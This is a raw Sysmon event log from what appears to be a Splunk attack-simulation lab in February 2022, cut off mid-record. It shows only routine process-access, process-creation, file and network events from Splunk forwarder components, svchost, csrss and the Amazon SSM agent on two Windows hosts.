10341000x8000000000000000214266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E43-6216-FB03-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E43-6216-FB03-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.608{4F8D34B0-0E43-6216-FB03-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:52.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5224D3323F176DD7EBE1E736AB7E2B32,SHA256=3D30E522CAE6302B392C5F21E78D9AAF1697AC19891F5F27551EC2051F8891F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:52.748{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9C27B828A687CABC55EA88047101276,SHA256=268D143E2140262E5360C0D14C6A2F727ED43150C0EBA2DF2282BD9811A25FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:52.431{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B629AEA250E3AC57D4F9BD92AEB32A,SHA256=C1F972C69DC7A941E7D1AA85D6EA0DB8901BB5F90B983684A4328D8EA2B2EB42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:53.763{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E19BBBB7696A35DECCA0E4B51BCBFED,SHA256=5007B30A0BD553622A36DD0D4E5D526E20FC560EEB4850F7F42A5541B7F04AD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:53.447{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89381D7948C5B6C3F006442701055DF0,SHA256=3B3EFADA8ED901652EA78DC1389ED5516A3BDEDB6AAE31804CE7EA5E9D1937DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:54.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7042932F3E738DFAE4D0DF548A352CE1,SHA256=31BCF174ABFC1AA37530FD6415A228DB0FD83841F95976049DBE84DD6F870BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:54.478{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF80F9394BC8FDF547E856B293B8A597,SHA256=3CB8B89A8F54C8D573D3977BF65056B454AD3363337D6FA14D7E8604FB3FD6FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:55.904{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACDF336185FDCE31F4EE18290DE5F0F4,SHA256=4360AE0C28BD26F278DBFC4D67DC2602F1E0B6E8A83628CDF93B12A42BE81811,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:53.627{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53229-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:55.575{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-120MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:55.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2FBD3B467C169825E96B766BA5F1F78,SHA256=501606DA0BF5964BB35152C85DC4F63D905A586EF2F88831A79A2DE7C90AE24D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:56.904{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A87322D4963A77FF5C5F008F623A056,SHA256=02FF5CB569D3F29D5831E009E4D23BF48D7D2B39A2CA46CEB5E8C18C71E30D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:56.590{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-121MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:56.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C273BA5BE01415AE81E1F4E50CF1F4D5,SHA256=DE9D2B5D519AC20F6A92B7FEA76F81842838BA2D3EF0F47146BEA9C09890FB68,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:53.593{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51176-false10.0.1.12-8000- 23542300x8000000000000000214283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:57.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F5934E65EAF3F675A00C144E16885E,SHA256=66045B52A6B8FD9D88D00C96050B7110C24253AB1724590A6E220E2FB75F1E4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:57.622{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FD962209191DA433926082FAC4ACBC,SHA256=97CF4BAF71FA14BC411FECC70A0AE0A983FA5CEE91383566D0654B055C711EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:58.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85598CA1BA3C6A5CB36EBA0515388D30,SHA256=2825CD2F514AA12F9EA4FE942E71ED35A7C02EC9BD42CF1B04CA8DC8A8FA0A14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:58.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656B1153E7ED00D0CCCF8F655F946A0A,SHA256=50CA41A78F400C21FB8AEB44EF92DBA14D80379A410E4EE859E8B16409A2B303,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:59.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4DBFB63926C2522B858E55F7E0F64E,SHA256=72838F5E340AE943D3A7AC078A272E2346A033799F82E844434500DB53D30889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:59.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E3F2D981D3B87FD0EE4922B0FB5250D,SHA256=BB3772A9A1D8615E36F4EDDC06DBA0011AF8FB18A64C491D454BDBE64B48DE86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:00.935{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5DA5E9DA9DD3BFA4F9A2B7DFB2DAB73,SHA256=C92855862C5A0FC9C763E2627CD59581FC95DE34F8F817E469BFD930E166281C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:00.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5D7E010AE308C6CC115A081A571BB42,SHA256=7BD15A6FF2EE454BE58721D54847BB4A295B5209A33A15D93C7AA99F73FD8E6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:01.935{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B9B8ECABC9385D845E5E9893ED5D3C9,SHA256=E91021800E551D4136B1343DDC0222376612FFB4ACE968558F9777BFF07C8DA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:58.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:01.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D29C07FC978671082A2DF16773906145,SHA256=9E227091D2228A2571E90C6D0BF36FB6FC4C824F7863FBBA1727C2026DD4E460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:02.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E64CDBB88C5B68556B03A971015A03E9,SHA256=F4E2A1E4AB6F4F4B72B56F01616B6025E7961AB9D68540FD91363CF4FEDA71A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DFA6B5F2A3681371229AB9893499499,SHA256=E435745785E3E328CC6CFB72CF5EAB8849671F881C4608E76226345ADE5DE883,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:59.499{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51177-false10.0.1.12-8000- 10341000x8000000000000000285147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E4E-6216-A604-000000003802}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E4E-6216-A604-000000003802}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:02.638{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E4E-6216-A604-000000003802}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 